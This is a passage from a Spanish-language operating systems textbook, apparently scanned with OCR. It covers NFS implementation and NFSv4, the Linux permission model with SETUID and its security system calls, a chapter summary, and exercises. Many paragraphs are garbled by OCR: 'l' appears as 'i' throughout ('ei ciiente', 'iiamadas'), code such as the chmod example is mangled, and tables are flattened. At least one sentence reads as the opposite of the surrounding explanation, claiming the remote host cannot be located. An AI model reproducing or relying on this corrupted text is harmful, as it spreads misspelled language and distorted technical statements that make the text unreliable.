mo adicional independiente para manejar el bloqueo. 

NFS utiliza el mecanismo de protección estándar de UNIX, con los bits rwx para el propieta¬ 
rio, grupo y otros (que mencionamos en el capítulo 1 y analizaremos con detalle a continuación). 
En un principio, cada mensaje de petición simplemente contiene los IDs de usuario y grupo del pro¬ 
ceso que hace la llamada, que el servidor NFS utiliza para validar el acceso. En efecto, confía en 
que los clientes no hagan trampa. Varios años de experiencia demostraron en abundancia que dicha 
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suposición era (¿cómo podríamos decirio?) bastante ingenua. En ia actuaiidad se puede utiiizar ia 
criptografía de ciaves púbiicas para estabiecer una ciave segura y vaiidar ei ciientey ei servidor en 
cada petición y respuesta. Cuando se utiiiza esta opción, un ciiente maiicioso no puede hacerse pa¬ 
sar por otro ciiente, ya que no conoce ia ciave secreta de ese otro ciiente. 

Implementación del NFS 

Aunque ia impiementación dei código dei ciientey servidor es independiente de ios protocoios dei 
NFS, i a mayoría de ios sistemas Linux utiiizan una impiementación de tres niveies, simiiar a ia de 
ia figura 10-36. Ei nivei superior es ei nivei de iiamadas ai sistema. Este nivei maneja ias iiamadas 
como open, ready cióse. Después de anaiizar ia iiamaday comprobar ios parámetros, invoca ai se¬ 
gundo nivei: ei nivei dei Sistema deArchivos Virtuai (VFS). 


Kernel del cliente Kernel del servidor 



Figura 10-36. La estructura de niveles del NFS. 


La tarea del nivel VFS es mantener una tabla con una entrada para cada archivo abierto. El ni¬ 
vel VFS tiene una entrada, un nodo-i virtual o nodo-v, para cada archivo abierto. Los nodos-v se 
utilizan para saber si el archivo es local o remoto. Para los archivos remotos se proporciona informa¬ 
ción suficiente para poder acceder a ellos. Para los archivos locales se registran el sistema de archi¬ 
vos y el nodo-i, debido a que los sistemas Linux modernos aceptan varios sistemas de archivos (por 
ejemplo, ext2fs, /proc, FAT, etc.). Aunque el VFS se inventó para aceptar el NFS, la mayoría de los 
sistemas Linux lo admiten ahora como parte integral del sistema operativo, aunque no se utilice. 

Para ver cómo se usan los nodos-v, vamos a trazar una secuencia de llamadas al sistema mount, 
open y read. Para montar un sistema de archivos remoto, el administrador del sistema (o /etc/rc) 
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llama al programa mount y especifica ei directorio remoto, ei directorio iocai en ei que se va a mon¬ 
tar y demás información necesaria. Ei programa mount anaiiza ei nombre dei directorio remoto que 
se va a montar y descubre ei nombre dei servidor NFS en ei que se encuentra. Después se pone en 
contacto con esa máquina y ie pide un manejador de archivo para ei directorio remoto. Si ei direc¬ 
torio existe y está disponibie para ei montaje remoto, ei servidor devueive un manejador de archi¬ 
vo para ei directorio. Por úitimo reaiiza una iiamada ai sistema mount y ie pasa ei manejador ai 
kernei. 

Después ei kernei construye un nodo-v para ei directorio remoto y pide ei código ciiente dei 
NFS en ia figura 10-36 para crear un nodo-r (nodo-i remoto) en sus tabias internas para guardar ei 
manejador de archivo. Ei nodo-v apunta ai nodo-r. Cada nodo-v en ei nivei dei VFS contiene un 
apuntador a un nodo-r en ei código ciiente dei NFS, o un apuntador a un nodo-i en uno de ios sis¬ 
temas de archivos iocai es (que en ia figura 10-36 se muestran con iíneas punteadas). A sí, dei nodo- 
V se puede ver si un archivo o directorio es iocai o remoto. Si es iocai, se pueden iocaiizar ei sistema 
de archivos y ei nodo-i correctos. Si es remoto, no se pueden iocaiizar ei host remoto ni ei maneja¬ 
dor dei archivo. 

Cuando se abre un archivo remoto en ei ciiente, en cierto punto durante ei anáiisis dei nombre 
de ruta, ei kernei encuentra ei directorio en ei que está montado ei sistema de archivos remoto. Ei 
kernei ve que este directorio es remoto y en ei nodo-v de ese directorio encuentra ei apuntador ai 
nodo-r. Después pideei código ciiente dei NFS para abrirei archivo. Ei código ciiente dei NFS bus¬ 
ca ia porción restante dei nombre de ruta en ei servidor remoto asociado con ei directorio montado 
y recibe de vueita un manejador de archivo para éi. Crea un nodo-r para ei archivo remoto en sus 
tabias y se reporta de vueita ai nivei dei V FS, ei cuai coioca en sus tabias un nodo-v para ei archi¬ 
vo que apunta ai nodo-r. De nuevo, aquí podemos ver que cada archivo o directorio abierto tiene un 
nodo-v que apunta a un nodo-r o a un nodo-i. 

Ei proceso que hizo ia iiamada recibe un descriptor para ei archivo remoto. Este descriptor 
de archivo se asigna ai nodo-v mediante ias tabias en ei nivei dei VFS. Observe que no se hacen 
entradas en ia tabia dei iado servidor. A unque ei servidor está preparado para proporcionar ios ma¬ 
nejadoras de archivo cuando se io soiiciten, no iieva ei registro de cuáies archivos tienen maneja¬ 
doras de archivo pendientes y cuáies no. Cuando se ie envía un manejador de archivo para acceder 
a ese archivo, comprueba ei manejador y, si es váiido, io utiiiza. La vaiidación puede inciuir ia 
verificación de una ciave auténtica contenida en ios encabezados RFC, si ia seguridad está habi- 
iitada. 

Cuando se utiiiza ei descriptor de archivo en una iiamada subsiguiente ai sistema (por ejempio, 
nead), ei nivei dei VFS iocaiiza ei nodo-v correspondiente, y a partir de éi determina si es iocai o 
remoto, y también cuái nodo-i o nodo-r io describe. Después envía un mensaje ai servidor que con¬ 
tiene ei manejador, ei despiazamiento dei archivo (que se mantiene dei iado ciiente, no dei iado ser¬ 
vidor) y ia cuenta de bytes. Por cuestiones de eficiencia, ias transferencias entre ciiente y servidor 
se reaiizan en grandes trozos, por io generai de 8192 bytes, aun si se soiicitan menos bytes. 

Cuando ei mensaje de petición iiega ai servidor, se pasa ai nivei dei VFS ahí, ei cuai determi¬ 
na qué sistema de archivos iocai contiene ei archivo soiicitado. Después, ei nivei dei VFS reaiiza 
una iiamada a ese sistema de archivos iocai para ieer y devoiver ios bytes. Estos datos a su vez se 
pasan de vueita ai ciiente. Una vez que ei nivei dei VFS dei ciiente recibe ei trozo de 8 K B que pi¬ 
dió, emite de manera automática una petición por ei siguiente trozo, para tenerio pronto en caso de 
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necesitarlo. A esta característica se le conoce como lectura adelantada y mejora el rendimiento de 
manera considerable. 

Para las escrituras se sigue una ruta análoga del cliente al servidor. Además, las transferencias 
se realizan en trozos de 8 KB también. Si una llamada al sistema write suministra menos de8 KB 
de datos, éstos simplemente se acumulan en forma local. Solo hasta que esté lleno el trozo comple¬ 
to de 8 KB es cuando se envía al servidor. Sin embargo, cuando se cierra un archivo todos sus da¬ 
tos se envían al servidor de inmediato. 

Otra técnica que se utiliza para mejorar el rendimiento es la caché, como en el sistema UNIX 
ordinario. Los servidores colocan datos en la caché para evitar los accesos al disco, pero esto es 
invisible para los clientes, quienes mantienen dos cachés: una para los atributos del archivo (no- 
dos-i) y otra para los datos. Cuando se necesita un nodo-i o un bloque de archivo, se realiza una 
comprobación para ver si se puede satisfacer desde la caché. De ser así, se puede evitar el tráfico 
de la red. 

Aunque la caché de los clientes ayuda de manera considerable en el rendimiento, también in¬ 
troduce algunos problemas serios. Suponga que dos clientes colocan en caché el mismo bloque de 
archivo y que uno de ellos lo modifica. Cuando el otro lea el bloque, obtendrá el valor anterior (ran¬ 
cio). La caché no es coherente. 

Dada laseveridad potencial de este problema, la implementación del NFS hace vari as cosas pa¬ 
ra mitigarla. En primer lugar, asocia un temporizadoracada bloque de caché. Cuando expira el tem- 
porizador, se descarta la entrada. Por lo general, el temporizador es de 3 segundos para los bloques 
de datos y de 30 segundos para los bloques de directorios. Esto reduce el riesgo en cierto grado. 
Además, cada vez que se abre un archivo en la caché, se envía un mensaje al servidor para averi¬ 
guar cuándo se modificó por última vez. Si la última modificación ocurrió después de colocar en 
caché la copia local, se descarta esta copia local y se obtiene la nueva copia del servidor. Por últi¬ 
mo, hay un temporizador que expira una vez cada 30 segundos, y todos los bloques sucios (es de¬ 
cir, modificados) en la caché se envían al servidor. Aunque no son perfectos, estos parches 
aumentan la utilidad del sistema en la mayoría de las circunstancias prácticas. 

NFS versión 4 

La versión 4 del Sistema de archivos de red (NFS)se diseñó para simplificar ciertas operaciones de 
su predecesor. A diferencia del NSFv3, que analizamos anteriormente, el NFSv4 es un sistema 
de archivos con estado. Esto permite la invocación de operaciones open en archivos remotos, ya 
que el servidor NFS remoto mantendrá todas las estructuras relacionadas con el sistema de archi¬ 
vos, incluyendo el apuntador del archivo. Así, no es necesario que las operaciones de lectura inclu¬ 
yan rangos de lectura absolutos, pero se pueden aplicar en forma incremental desde la posición 
anterior del apuntador del archivo. Esto produce mensajes más cortos y también la habilidad de in¬ 
tegrar varias operaciones del NFSv3 en una sola transacción de red. 

La naturaleza con estado del NFSv4 facilita la integración de la variedad de protocolos del 
NFSv3 (que se describieron antes en esta sección) en un solo protocolo coherente. No hay necesi¬ 
dad de aceptar protocolos separados para montar, colocar en caché, bloquear o asegurar las opera¬ 
ciones. El NFSv4 también funciona mejor con la semántica de los sistemas de archivos Linux (y 
UNIX en general) y Windows. 
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10.7 LA SEGURIDAD EN LINUX 

Como clon de M INIX y UN IX, Linux ha sido un sistema mui ti usuario casi desde ei principio. Es¬ 
ta historia significa que ia seguridad y ei controi de ia información se integraron casi desde un prin¬ 
cipio. En ias siguientes secciones anaiizaremos aigunos de ios aspectos de seguridad de Linux. 

10.7.1 Conceptos fundamentales 

La comunidad de usuarios para un sistema Linux consiste en cierto número de usuarios registrados, 
cada uno de ios cuaies tiene un UID (User ID, ID de usuario) único. Un UID es un entero entre 0 
y 65,535. Los archivos (pero también ios procesos y otros recursos) se marcan con ei UID del pro¬ 
pietario. De manera predeterminada, el propietario de un archivo es la persona que lo creó, aunque 
hay una forma de cambiar la propiedad. 

L os usuarios se pueden organizar en grupos, que también se enumeran con enteros de 16 bits cono¬ 
cidos como GI Ds (G roup ID s, I Ds de grupo). EI proceso de asignar usuarios a los grupos se hace en for¬ 
ma manual (por medio del administrador del sistema) y consiste en crear entradas en una base de datos 
del sistema que indique el grupo al que pertenece cada usuario. Un usuario podría estar en uno o más gru¬ 
pos al mismo tiempo. Por cuestión de simplicidad, no analizaremos esta característica con más detalle. 

El mecanismo básico de seguridad en Linux es simple. Cada proceso lleva el UID y el GID de 
su propietario. Cuando se crea un archivo, éste recibe el UID y GID del proceso que lo creó. El ar¬ 
chivo también recibe un conjunto de permisos determinados por el proceso creador. Estos permisos 
especifican el acceso que tienen el propietario, los demás miembros del grupo del propietario y el 
resto de los usuarios para el archivo. Para cada una de estas tres categorías los accesos potenciales 
son de lectura, escritura y ejecución, designados por las letras r, w y x, respectivamente. Desde lue¬ 
go que la habilidad de ejecutar un archivo tiene sentido sólo si ese archivo es un programa binario 
ejecutable. Si el usuario intenta ejecutar un archivo que tenga permiso de ejecución pero que no 
sea ejecutable (es decir, que no empiece con un encabezado válido), se producirá un error. Como hay 
tres categorías de usuarios y 3 bits por categoría, se requieren 9 bits para representar los permisos de 
acceso. En la figura 10-37 se muestran algunos ejemplos de estos números de 9 bits y su significado. 


Binario 

Simbóiico 

Accesos permitidos para ei archivo 

111000000 

rwx- 

El propietario puede leer, escribir y ejecutar 

111111000 

rwxrwx— 

El propietario y el grupo pueden leer, escribir y ejecutar 

110100000 

rw-r- 

El propietario puede leer y escribir; el grupo puede leer 

110100100 

rw-r—r— 

El propietario puede leer y escribir; todos los demás pueden leer 

111101101 

rwxr-xr-x 

El propietario puede hacer todo, el resto puede leer y ejecutar 

000000000 


Nadie tiene acceso 

000000111 

-rwx 

Sólo los usuarios externos tienen acceso (extraño, pero válido) 


Figura 10-37. A Igunos ejemplos de modos de protección de archivos. 
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Las primeras dos entradas en la figura 10-37 son claras, ya que permiten al propietario y al 
grupo del propietario el acceso completo, respectivamente. La siguiente entrada permite al gru¬ 
po del propietario leer el archivo pero no modificarlo, y evita que los usuarios externos tengan 
acceso. La cuarta entrada es común para un archivo de datos que el propietario desea hacer pú¬ 
blico. De manera similar, la quinta entrada es la común para un programa disponible al público. 
L a sexta entrada niega todo tipo de acceso a todos los usuarios. A Igunas veces se emplea este mo¬ 
do para los archivos de señuelo que se utilizan para la exclusión mutua, debido a que el intento 
de crear dicho archivo fracasará si ya existe uno. Por lo tanto, si varios procesos intentan al mis¬ 
mo tiempo crear dicho archivo como un bloqueo, sólo uno de ellos tendrá éxito. El último ejem¬ 
plo es sin duda extraño, ya que proporciona al resto del mundo más acceso que al propietario. 
Sin embargo, su existencia es un resultado de las reglas de protección. Por fortuna, hay una 
manera de que el propietario cambie después el modo de protección, aunque no tenga acceso al 
archivo en sí. 

El usuario con U ID 0 es especial y se le conoce como superusuario (o root). El superusuario 
tiene el poder de leer y escribir todos los archivos en el sistema, sin importar quién sea el propieta¬ 
rio y la forma en que estén protegidos. Los procesos con UID 0 también tienen la habilidad de 
realizar un pequeño número de llamadas protegidas al sistema que se niegan a los usuarios ordina¬ 
rios. Por lo general, sólo el administrador del sistema conoce la contraseña del superusuario, aun¬ 
que muchos estudiantes universitarios consideran un gran deporte tratar de buscar fallas de 
seguridad en el sistema, para que puedan iniciar sesión como superusuario sin conocer la contrase¬ 
ña. La administración tiende a ver mal dicha actividad. 

Los directorios son archivos y tienen los mismos modos de protección que los archivos ordi¬ 
narios, excepto que los bits x se refieren al permiso de búsqueda en vez del permiso de ejecutar. Por 
lo tanto, un directorio con el modo rwxr-xr-x permite a su propietario leer, modificar y realizar bús¬ 
quedas en el directorio, pero sólo permite a los demás leer y buscaren él, pero no agregar ni elimi¬ 
nar archivos. 

Los archivos especiales que corresponden a los dispositivos de E/S tienen los mismos bits de 
protección que los archivos regulares. Este mecanismo se puede utilizar para limitar el acceso a los 
dispositivos de E/S. Por ejemplo, el archivo especial de la impresora /dev/lp podría ser propiedad 

del usuario root, de un usuario especial o de un demonio, y tener el modo rw.para evitar que 

alguien más tenga acceso a la impresora. Después de todo, si cualquiera pudiera imprimir a volun¬ 
tad, se produciría un caos. 

Desde luego que si un demonio es propietario de /dev/lp con el modo de protección rw., 

significa que nadie más puede usar la impresora. Aunque esto salvaría a muchos árboles inocentes 
de una muerte anticipada, algunas veces los usuarios tienen la necesidad legítima de imprimir algo. 
De hecho, hay un problema más general en cuanto a permitir el acceso controlado a todos los dis¬ 
positivos de E/S y otros recursos del sistema. 

Este problema se resolvió al agregar un nuevo bit de protección, el bitSETUID a los 9 bits de 
protección antes descritos. Cuando se ejecuta un programa con el bit SETUID activado, el UID 
efectivo para ese proceso se convierte en el UID del propietario del archivo ejecutable, en vez del 
UID del usuario que lo invocó. Cuando un proceso trata de abrir un archivo, se comprueba el UID 
efectivo y no el UID real subyacente. AI hacer que el programa que utiliza la impresora sea propie¬ 
dad de un demonio pero con el bit SETU ID encendido, cualquier usuario podría utilizarlo y tener 
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el poder del demonio (por ejemplo, el acceso a /dev/lp), pero sólo para ejecutar ese programa (que 
podría poner los trabajos de impresión en una cola para imprimir en forma ordenada). 

M uchos programas sensibles de Linux son propiedad del usuario root pero tienen activado el 
bit SETU ID. Por ejemplo, el programa que permite a los usuarios modificar sus contraseñas (pass- 
wd) necesita escribir en el archivo de contraseñas. No sería conveniente hacer que todo el mundo 
pudiera escribir en el archivo de contraseñas. En vez de ello, hay un programa que es propiedad del 
usuario root y tiene activado el bitSETUID. Aunque el programa tiene acceso completo al archivo 
de contraseñas, sólo modificará la contraseña del que lo llama y no permitirá ningún otro tipo de 
acceso al archivo de contraseñas. 

A demás del bitSETUID hay un bitSETGID que trabaja en forma similar, ya que otorga de ma¬ 
nera temporal el GID efectivo del programa al usuario. Sin embargo, este bit se utiliza raras veces 
en la práctica. 

10.7.2 Llamadas al sistema de seguridad en Linux 

Sólo hay un pequeño número de llamadas al sistema relacionadas con la seguridad. Las más impor¬ 
tantes se listan en la figura 10-38. La llamada al sistema de seguridad que se utiliza con más fre¬ 
cuencia es chmod. Se utiliza para cambiar el modo de protección. Por ejemplo, 

s = chmocl(7usr/ast/nuevojuego”, 0755); 

establécelos permisos de nuevojuego a rwxr-xr-x, de manera que todos puedan ejecutarlo (observe que 
0755 es una constante octal, lo cual es conveniente ya que los bits de protección vienen en grupos de 
3 bits). Sólo el propietario de un archivo y el superusuario pueden modificar sus bits de protección. 


Llamada al sistema 

Descripción 

s = chmod{ruta, modo) 

Cambia el modo de protección de un archivo 

s = access(ruta, modo) 

Comprueba el acceso usando el UID y GID reales 

uid = getuid() 

Obtiene el UID real 

uid = geteuid{) 

Obtiene el UID efectivo 

gid = getgid() 

Obtiene el GID real 

gid = getegidí) 

Obtiene el GID efectivo 

s = chown{ruta, propietario, grupo) 

Cambia el propietario y el grupo 

s = setuid{uid) 

Establece el UID 

s = setgid{gid) 

Establece el GID 


Figura 10-38. Algunas llamadas al sistema relacionadas con la seguridad. El código 
de retorno s es -1 si ocurrió un error; uid y gid son el UID y GID, respectivamente. 
Los parámetros se explican por sí solos. 


La llamada a access prueba si se permite un acceso específico mediante el uso del UID y GID 
verdaderos. Esta llamada al sistema se necesita para evitar las fugas de seguridad en los programas 
que tienen activo el bit SETUID y son propiedad del usuario root. Dicho programa puede hacer 
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cualquier cosa, y algunas veces es necesario para el programa averiguar si se permite al usuario rea¬ 
lizar cierto acceso. El programa no puede probarlo, ya que el acceso siempre tendrá éxito. Con la 
llamada a access, el programa puede averiguar si se permite el acceso con el UID y GID reales. 

Las siguientes cuatro llamadas al sistema devuelven los UID y GID efectivos. Las últimas tres 
sólo se permiten al superusuario. M edifican el propietario de un archivo, y los valores de UID y 
GID de un proceso. 


10.7.3 Implementadón déla seguridad en Linux 

Cuando un usuario inicia sesión, el programa de inicio de sesión login (que es SETUID root) pide 
un nombre de inicio de sesión y una contraseña. A plica una función hash a la contraseña y después 
busca en el archivo de contraseñas /etc/passwd para ver si el hash coincide con la contraseña en ese 
archivo (los sistemas en red funcionan de manera un poco distinta). La razón de utilizar hashes es 
para evitar que se almacene la contraseña en forma no cifrada en cualquier parte del sistema. Si la 
contraseña es correcta, el programa de inicio de sesión busca en /etc/passwd para ver el nombre del 
Shell preferido del usuario, que posiblemente sea bash, pero también puede ser otro shell como csh 
o ksh. Después, el programa de inicio de sesión utiliza setuid y setgid para darse a sí mismo el 
UID y GID del usuario (recuerde que empezó como SETUID root). Luego abre el teclado para la 
entrada estándar (descriptor de archivo 0), la pantalla para la salida estándar (descriptor de archivo 
1) y la pantalla para el error estándar (descriptor de archivo 2). Por último, ejecuta el shell preferi¬ 
do y termina. 

En este punto, el shell preferido se está ejecutando con el UID y GID correctos, y la entrada, 
salida y error estándar tienen sus valores predeterminados. Todos los procesos que se bifurquen (es 
decir, los comandos que escriba el usuario) heredan de manera automática el UID y GID del shell, 
por lo que también tendrán el propietario y grupo correctos. Todos los archivos que creen también 
obtendrán estos valores. 

Cuando cualquier proceso intenta abrir un archivo, el sistema primero comprueba los bits de 
protección en el nodo-i del archivo y los compara con el UID y GID efectivos del que hizo la lla¬ 
mada, para ver si se permite el acceso. De ser así, el archivo se abre y se devuelve un descriptor 
de archivo. En caso contrario, el archivo no se abre y se devuelve -1. No se realizan comproba¬ 
ciones en las siguientes llamadas a read o write. Como consecuencia, si el modo de protección 
cambia una vez que se abre un archivo, el nuevo modo no afectará a los procesos que ya tengan el 
archivo abierto. 

En esencia, el modelo de seguridad de Linux y su implementación son iguales que en la mayo¬ 
ría de los demás sistemas UNIX tradicionales. 

10.8 RESUMEN 

Linux empezó su vida como un clon de UNIX completo de código fuente abierto, y ahora se utili¬ 
za en máquinas que van desde computadoras notebook hasta supercomputadoras. Existen tres inter¬ 
faces para Linux: el shell, la biblioteca deC y las llamadas al sistema. Además, a menudo se utiliza 
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una interfaz gráfica de usuario para simpiificar ia interacción dei usuario con ei sistema. Ei sheii 
permite a ios usuarios escribir comandos para ejecutados. Éstos pueden ser comandos simpies, tu¬ 
berías o estructuras más compiejas. La entrada y ia saiida se pueden redirigir. La bibiioteca de C 
contiene ias iiamadas ai sistema y también muchas iiamadas mejoradas, como printf para escribir sa¬ 
iida con formato en ios archivos. La interfaz actuai de iiamadas ai sistema es dependiente de ia ar¬ 
quitectura, y en ias piataformas x86 consiste en aproximadamente 250 iiamadas, cada una de ias 
cuaies hace io necesario y nada más. 

Los conceptos ciave en Linux inciuyen ei proceso, ei modeio de memoria, ia E/S y ei sistema 
de archivos. Los procesos pueden bifurcan subprocesos, con io cuai se produce un árboi de proce¬ 
sos. La administración de procesos en Linux es distinta en comparación con otros sistemas UNIX, 
en cuanto a que Linux considera a cada entidad de ejecución (un proceso con un soio hiio, o cada 
hiio dentro de un proceso muitihiio o ei kernei) como una tarea distinguibie. Así, un proceso (o una 
soia tarea en generai) se representa mediante dos componentes ciave: ia estructura de tarea y ia in¬ 
formación adicionai que describe ei espacio de direcciones dei usuario. La primera siempre está en 
memoria, pero ios datos dei segundo componente se pueden paginar hacia/fuera de ia memoria. La 
creación de procesos se iieva a cabo mediante ia dupiicación de ia estructura de tarea dei proceso, 
y después se estabiece ia información de ia imagen de memoria para que apunte a ia imagen de me¬ 
moria dei padre. Las copias actuaies de ias páginas de imagen de ia memoria se crean sóio si no se 
permite ia compartición y se requiere una modificación de ia memoria. A este mecanismo se ie co¬ 
noce como copiar ai escribir. La programación se reaiiza mediante ei uso de un aigoritmo basado 
en prioridades, que favorece a ios procesos interactivos. 

Ei modeio de memoria consiste en tres segmentos por proceso: texto, datos y piia. La adminis¬ 
tración de ia memoria se reaiiza mediante ia paginación. Un mapa en ia memoria iieva ei registro 
dei estado de cada página, y ei demonio de paginación utiiiza un aigoritmo de reioj de dobie mane- 
ciiia modificado para mantener suficientes páginas iibres a ia mano. 

Para acceder a ios dispositivos de E/S se usan archivos especiaies, cada uno de ios cuaies tie¬ 
ne un número de dispositivo mayor y un número de dispositivo menor. La E/S de dispositivos de 
bioques utiiiza ia memoria principai para coiocar en caché ios bioques de disco y reducir ei núme¬ 
ro de accesos ai mismo. La E/S de caracteres se puede reaiizar en modo crudo, o ios fiujos de ca¬ 
racteres se pueden modificar mediante discipiinas de iínea. Los dispositivos de red se tratan de una 
manera aigo distinta, ai asociar móduiosdeprotocoio de red compietos para procesar ei fiujo de pa¬ 
quetes de ia red hacia/desde ei proceso de usuario. 

Ei sistema de archivos es jerárquico con archivos y directorios. Todos ios discos se montan en 
un soio árboi de directorios que empieza en una raíz única. Los archivos individuaies se pueden vincu- 
iar en un directorio desde cuaiquier parte dei sistema de archivos. Para utiiizar un archivo primero 
se debe abrir, con io cuai se produce un descriptor de archivo para usario en ias operaciones de iec- 
tura y escritura dei archivo. En su interior, ei sistema de archivos utiiiza trestabias principaies: ia 
tabia de descriptores de archivos, ia tabia de descripción de archivos abiertos y ia tabia de nodos-i. 
Esta úitima es ia más importante de ias tabias, ya que contiene toda ia información administrativa 
sobre un archivo y ia ubicación de sus bioques. Los directorios y dispositivos también se represen¬ 
tan como archivos, junto con otros archivos especiaies. 

La protección se basa en ei controi dei acceso de iectura, escritura y ejecución para ei propie¬ 
tario, ei grupo y ios demás. Para ios directorios, ei bit de ejecución indica ei permiso de búsqueda. 
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PROBLEMAS 

1. U n directorio contiene los siguientes archivos: 


aardvark 

feret 

koala 

porpoise 

bonefish 

grunion 

llama 

quacker 

capybara 

hyena 

marmot 

rabbit 

dingo 

ibex 

nuthatch 

seahorse 

emú 

jellyfish 

ostrich 

tuna 


¿Qué archivos listará el comando 
Is [abc]*e*? 

2. ¿Qué hace la siguiente tubería (pipe) del shell de Linux? 
grep nd xyz | wc -I 

3. Escriba una tubería de Linux que imprima la octava línea del archivo z en la salida estándar. 

4. ¿Por qué Linux distingue la salida estándar del error estándar, cuando ambos tienen la terminal co¬ 
mo valor predeterminado? 

5. U n usuario en una terminal escribe los siguientes comandos: 
a I b I c & 

d I e I f & 

Después de que el shell los procese, ¿cuántos nuevos procesos habrá en ejecución? 

6 . Cuando el shell de Linux empieza un proceso, coloca copias de sus variables de entorno (como 
HOME) en la pila del proceso, para que éste pueda averiguar cuál es su directorio de inicio. 
Si este proceso se bifurca más adelante, ¿el hijo obtendrá de manera automática estas variables 
también? 

7. Determine cuánto tiempo requiere un sistema UNIX tradicional para bifurcar un proceso hijo bajo 
las siguientes condiciones: tamaño del texto = 100 KB, tamaño de datos = 20 KB, tamaño de pila = 
10 KB, estructura de tarea = 1 KB, estructura de usuario =5 KB. La trampa del kernel y el retorno 
requieren 1 mseg, y la máquina puede copiar una palabra de 32 bits cada 50 nseg. Los segmentos 
de texto son compartidos, pero los de datos y de pila no. 

8 . A medida que los programas de varios megabytes se hicieron más comunes, el tiempo invertido en 
ejecutar la llamada al sistema fork y copiar los segmentos de datos y de pila del proceso que hacía 
la llamada aumentó en forma proporcional. Cuando se ejecuta fork en Linux, no se copia el espa¬ 
cio de direcciones del padre, como lo indica la semántica tradicional de fork. ¿Cómo evita Linux 
que el hijo haga algo que cambiaría por completo la semántica de fork? 

9. ¿Tiene sentido quitar la memoria a un proceso cuando entra al estado zombie? ¿Por qué sí o por qué 
no? 

10. ¿Por qué cree usted que los diseñadores de Linux hicieron que fuera imposible para un proceso en¬ 
viar una señal a otro proceso que no esté en su grupo de procesos? 
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11. U na llamada al sistema por lo general se implementa mediante el uso de una instrucción de interrup¬ 
ción (trampa) de software. ¿Se podría utilizar un procedimiento ordinario de igual forma en el hard¬ 
ware del Pentium? De ser así, ¿bajo qué condiciones y cómo? En caso contrario, ¿por qué no? 

12. En general, ¿piensa usted que los demonios tienen mayor o menor prioridad que los procesos inte¬ 
ractivos? ¿Por qué? 

13. Cuando se bifurca un nuevo proceso, se le debe asignar un entero único como su PID. ¿Basta con 
tener un contador en el kernel que se incremente con la creación de cada proceso, y que se utilice el 
contador como el nuevo PID? Explique su respuesta. 

14. En la entrada de cada proceso en la estructura de tarea se almacena el PID del padre. ¿Por qué? 

15. ¿Qué combinación de los bits banderas_compart que utiliza el comando clone deLinux correspon¬ 
de a una llamada a fork en U NIX convencional? ¿Y para crear un hilo en U NIX convencional? 

16. El programador de Linux pasó por una revisión mayor entre el kernel 2.4 y el 2.6. El programador 
actual puede tomar decisiones de programación en un tiempo 0(1). Explique por qué pasa esto. 

17. Al iniciar Linux (o la mayoría de los sistemas operativos, para esa cuestión), el cargador de arran¬ 
que (bootstrap) en el sector 0 del disco carga primero un programa de inicio, el cual a su vez carga 
el sistema operativo. ¿Por qué es necesario este paso adicional? Sin duda sería más sencillo que el 
cargador de arranque en el sector 0 simplemente cargara el sistema operativo directamente. 

18. Cierto editor tiene 100 KB de texto de programa, 30 KB de datos i nidal izados y 50 KB de BSS. La 
pila inicial es de 10 KB. Suponga que se inician tres copias de este editor al mismo tiempo. ¿Cuán¬ 
ta memoria física se requiere si (a) se utiliza texto compartido y (b) si no se utiliza? 

19. ¿Por qué son necesarias las tablas de descriptores de páginas en Linux? 

20. En Linux, los segmentos de datos y de pila se paginan e intercambian a una copia reutilizable que 
se mantiene en un disco o partición de paginación especial, pero el segmento de texto utiliza el ar¬ 
chivo binario ejecutable. ¿Por qué? 

21. Describa una forma de usar mmap y las señales para construir un mecanismo de comunicación entre 
procesos. 

22. U n archivo se asigna mediante la siguiente llamada al sistema mmap: 

mmap( 65536, 32768, READ, FLAGS, fd, 0) 

Las páginas son de 8 KB. ¿A qué byte se accede en el archivo al leer un byte en la dirección de me¬ 
moria 72,000? 

23. Después de ejecutar la llamada al sistema del problema anterior, se realiza la llamada 

munmap(65536, 8192) 

¿Tiene éxito? De ser así, ¿cuáles bytes del archivo permanecen asignados? En caso contrario, ¿Por 
qué fracasó? 

24. ¿Puede un fallo de página ocasionar que el proceso que falló se termine? De ser así, proporcione un 
ejemplo. En caso contrario, ¿por qué no? 
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25. ¿Es posible que con el sistema de colegas para administrar la memoria se dé el caso de que co-exis- 
tan dos bloques adyacentes de memoria libre del mismo tamaño sin combinarse en un bloque? De 
ser así, explique cómo. En caso contrario, muestre que es imposible. 

26. En el texto se declara que una partición de paginación tendrá un mejor desempeño que un archivo 
de paginación. ¿Por qué? 

27. Proporcione dos ejemplos de las ventajas de los nombres de rutas relativas en comparación con las 
rutas absolutas. 

28. U na colección de procesos realiza las siguientes llamadas de bloqueo. Para cada llamada, explique 
lo que ocurre. Si un proceso no puede obtener un bloqueo para el archivo, se bloquea. 

a) A desea un bloqueo compartido en los bytes 0 a 10. 

b) B desea un bloqueo exclusivo en los bytes 20 a 30. 

c) C desea un bloqueo compartido en los bytes 8 a 40. 

d) A desea un bloqueo compartido en los bytes 25 a 35. 

e) B desea un bloqueo exclusivo en el byte 8. 

29. Considere el archivo bloqueado de la figura 10-26(c). Suponga que un proceso trata de bloquear los 
bytes 10 y 11 y se bloquea. Después, antes de que C libere su bloqueo, otro proceso trata de blo¬ 
quear los bytes 10 y 11, y también se bloquea. ¿Qué tipos de problemas se introducen en la semán¬ 
tica debido a esta situación. Proponga y defienda dos soluciones. 

30. Suponga que una llamada al sistema iseek busca datos en un desplazamiento negativo en un archi¬ 
vo. M endone dos formas posibles de lidiar con ello. 

31. Si un archivo de Linux tiene el modo de protección 755 (octal), ¿qué pueden hacer el propietario, el 
grupo del propietario y todos los demás con ese archivo? 

32. A Igunas unidades de cinta tienen bloques enumerados y la habilidad de sobrescribir un bloque es¬ 
pecífico en su lugar, sin perturbara los bloques que están en frente o detrás de él. ¿Podría dicho dis¬ 
positivo contener un sistema de archivos de Linux montado? 

33. En la figura 10-24, tanto Fred como Lisa tienen acceso al archivo x en sus respectivos directorios 
después de la vinculación. ¿Es este acceso completamente simétrico, en el sentido en que cualquie¬ 
ra de ellos puede hacer lo mismo que el otro con ese archivo? 

34. Como hemos visto, los nombres de rutas absolutas se buscan empezando desde el directorio raíz y 
los nombres de rutas relativas se buscan desde el directorio de trabajo. Sugiera una manera eficien¬ 
te de implementar ambos tipos de búsquedas. 

35. Al abrir el archivo /usr/ast/trabajo/f, se requieren varios accesos al disco para leer el nodo-i y los 
bloques de directorios. Calcule el número de accesos al disco requeridos, suponiendo que el nodo-i 
para el directorio raíz siempre está en memoria, y que todos los directorios tienen un bloque. 

36. Un nodo-i de Linux tiene 12 direcciones del disco para los bloques de datos, así como las direccio¬ 
